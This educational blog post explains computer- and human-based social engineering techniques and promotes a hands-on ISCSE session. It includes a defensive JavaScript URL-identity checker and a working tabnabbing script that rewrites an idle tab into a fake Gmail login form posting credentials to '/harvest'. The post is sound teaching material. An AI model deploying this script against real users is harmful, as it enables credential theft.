Image source: http://www.madsecurity.com/wp-content/uploads/2012/08/social-engineering-still.png
- Computer Based
- Human Based
Computer-based attacks impersonate legitimate websites and applications to trick victims into entering confidential or otherwise important information through a computer. The following are a few techniques that use a computer-based approach.
Phishing
This is the technique of creating a fake clone of a legitimate website that the user frequently visits; common targets are social networking sites like Facebook and webmail such as Gmail. A careless user enters his/her login details into the clone without checking its identity (the address bar shows the attacker's domain, not the real one). The attacker logs the credentials the user just entered and then redirects to the legitimate website, so the victim notices no difference.
Baiting
Baiting means intentionally leaving a pen drive/CD/DVD that contains malware (a trojan) in a place where the victim is likely to find it. In most cases, when someone sees a pen drive that does not seem to have an owner, they plug it into their computer to check its contents. If the victim plugs in the USB stick or inserts the CD/DVD, the malware or trojan horse on it is silently installed on the system in the background. Even after the device is removed, the malware stays installed. The same kind of payload can also be delivered through drive-by downloads, where merely visiting a web page triggers the install.
Tabnabbing
Tabnabbing is similar to phishing but takes a rather different approach. The victim first opens a harmless-looking malicious page, then switches to another site in a different browser tab. Once the malicious tab has been inactive for some time, its script rewrites the page (content, title and favicon) to look like the login page of a well-known site, i.e. it turns itself into the phishing page. When the victim returns to that tab, he/she may not realise that the page has changed, and phishing happens if the user enters his/her information.
Popup windows
Browser popup windows are a common way to offer discounts and other offers that users are tempted to click on. They can also be dangerous, since an attacker can use them to redirect a user to a malicious site.
And many more:
- URLs in Instant messages/IRC
- Email attachments
- Email scams
- Advertising websites and offers
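The phishing technique described above works because the victim does not check the site's identity. As an added example (not code from the original post or the ISCSE material), the JavaScript below shows what that check looks like in code: it takes the URL of a login page, reduces it to its registrable domain and compares that against a short allow-list of sites the user actually trusts, flagging lookalike domains (digit-for-letter swaps) and brand names parked on an unrelated domain. The allow-list, the confusable table and all sample URLs are constructed for illustration, and the two-label domain rule is a simplification of the Public Suffix List.

```javascript
// Added example, not code from the original post: checking a login URL's identity
// the way a careful user should before typing a password into it.
// The allow-list, confusable table and sample URLs are constructed for illustration.

// Registrable domains the user actually trusts (assumed allow-list).
const TRUSTED = ["facebook.com", "gmail.com", "google.com"];

// Common digit-for-letter and pair-for-letter swaps used in lookalike domains.
// This is a partial table; real tooling uses a full confusables list.
const CONFUSABLES = { "0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w" };

// Undo the confusable swaps so "faceb00k.com" compares equal to "facebook.com".
function normalizeDomain(domain) {
  let out = domain.toLowerCase();
  for (const [fake, real] of Object.entries(CONFUSABLES)) {
    out = out.split(fake).join(real);
  }
  return out;
}

// Reduce a hostname to the part a registrar hands out: the last two labels.
// Simplification: correct for .com/.org style suffixes, wrong for e.g. .co.uk,
// where the Public Suffix List must be consulted instead.
function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().replace(/\.$/, "").split(".");
  return labels.slice(-2).join(".");
}

// Decide whether credentials should be entered at this URL.
function checkLoginUrl(urlString) {
  let url;
  try {
    url = new URL(urlString);
  } catch (e) {
    return { verdict: "invalid", reason: "not a parseable URL" };
  }
  if (url.protocol !== "https:") {
    return { verdict: "suspicious", reason: "login form served over " + url.protocol };
  }
  // Only the registrable domain counts. "facebook.com.login-verify.example" is
  // a subdomain of login-verify.example, whatever the first labels say.
  const domain = registrableDomain(url.hostname);
  if (TRUSTED.includes(domain)) {
    return { verdict: "ok", domain };
  }
  const normalized = normalizeDomain(domain);
  if (TRUSTED.includes(normalized)) {
    return { verdict: "lookalike", domain, reason: "resembles " + normalized };
  }
  // Brand name present in the host or path, but the domain is not the brand's.
  const brands = TRUSTED.map((t) => t.split(".")[0]);
  if (brands.some((b) => urlString.toLowerCase().includes(b))) {
    return { verdict: "suspicious", domain, reason: "brand name on an untrusted domain" };
  }
  return { verdict: "untrusted", domain };
}

// Constructed sample links, as a user might receive them in chat or email.
const SAMPLE_LINKS = [
  "https://www.facebook.com/login.php",
  "https://faceb00k.com/login.php",
  "https://facebook.com.login-verify.example/",
  "http://mail.google.com/",
  "https://example.net/offer",
];

function auditLinks(links) {
  return links.map((link) => Object.assign({ url: link }, checkLoginUrl(link)));
}

for (const result of auditLinks(SAMPLE_LINKS)) {
  console.log(result.verdict.padEnd(10), result.url, result.reason || "");
}
```

The decisive step is `registrableDomain`: attackers put the brand in a subdomain or in the path precisely because people read URLs left to right, while the browser hands the password to whoever owns the last two labels.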
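For the tabnabbing technique described above, here is an added example (not code from the original post or the ISCSE material) of the mechanism in JavaScript. The timing decision is a small pure state machine, so it can be checked without a browser; `installTabnab` wires it to the real `visibilitychange` event and `disguiseAs` performs the rewrite of title, favicon and body. The brand name, the favicon path and the `/harvest` form target are constructed placeholders.

```javascript
// Added example, not code from the original post: the tabnabbing mechanism.
// The timing logic is a pure state machine (testable without a browser); the
// DOM code below it is what the malicious page actually rewrites. Brand name,
// favicon path and the /harvest form target are constructed placeholders.

const SWAP_AFTER_MS = 5000; // how long the tab must stay hidden before it changes

function createTabnabState(swapAfterMs = SWAP_AFTER_MS) {
  return { hiddenSince: null, swapped: false, swapAfterMs };
}

// Record a visibility change. Returning to the tab before the delay resets the
// timer, so a victim who glances back quickly still sees the original page.
function onVisibility(state, hidden, now) {
  const hiddenSince = hidden ? (state.hiddenSince === null ? now : state.hiddenSince) : null;
  return { ...state, hiddenSince };
}

// Called when the delay elapses: swap only if the tab is still hidden and has
// been hidden for at least swapAfterMs.
function tick(state, now) {
  if (state.swapped || state.hiddenSince === null) return state;
  if (now - state.hiddenSince < state.swapAfterMs) return state;
  return { ...state, swapped: true };
}

// Browser side: rewrite title, favicon and body to mimic a well-known login page.
// What it cannot rewrite is the address bar, which still shows the original domain.
function disguiseAs(doc, brand) {
  doc.title = "Sign in - " + brand;
  let icon = doc.querySelector('link[rel~="icon"]');
  if (!icon) {
    icon = doc.createElement("link");
    icon.rel = "icon";
    doc.head.appendChild(icon);
  }
  icon.href = "/" + brand.toLowerCase() + ".ico"; // attacker-hosted lookalike favicon (placeholder)
  doc.body.innerHTML =
    '<form method="post" action="/harvest"><h1>' + brand + "</h1>" +
    '<input name="user" placeholder="Email"><input name="pass" type="password">' +
    "<button>Sign in</button></form>";
}

// Wire the state machine to the Page Visibility API.
function installTabnab(win, brand) {
  const doc = win.document;
  let state = createTabnabState();
  doc.addEventListener("visibilitychange", () => {
    state = onVisibility(state, doc.hidden, Date.now());
    if (doc.hidden) {
      win.setTimeout(() => {
        state = tick(state, Date.now());
        if (state.swapped) disguiseAs(doc, brand);
      }, state.swapAfterMs);
    }
  });
}

// Only activate inside a real browser; under Node the functions are plain logic.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  installTabnab(window, "Gmail");
}
```

The defence follows from what the script cannot touch: the address bar still shows the original domain, and a browser password manager, which binds saved credentials to the origin, will not offer the real site's password on the disguised tab. Both are signals to check before typing anything into a tab you did not just open.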
In contrast to the above, human-based attacks rely on human-to-human interaction to deceive victims and obtain the information the attacker needs. The following are a few human-based approaches.
- Impersonating a technical staff member (such as a bank official, system administrator, service desk officer, etc.)
  - Gathering information verbally or by email/chat while impersonating a trusted technical officer or an authorised party.
- Shoulder surfing
  - Peeping at the keyboard to see what a user types as a password. The attacker must be near the victim, or have a way to watch remotely (a camera), while the user types the password.
- Dumpster diving
  - Searching through the victim's trash for sensitive information that was carelessly thrown away.
The above methods and much more will be discussed and demonstrated in ISCSE Session 1 on Social Engineering attacks, where participants will get hands-on experience in how these attacks are performed.
Further References: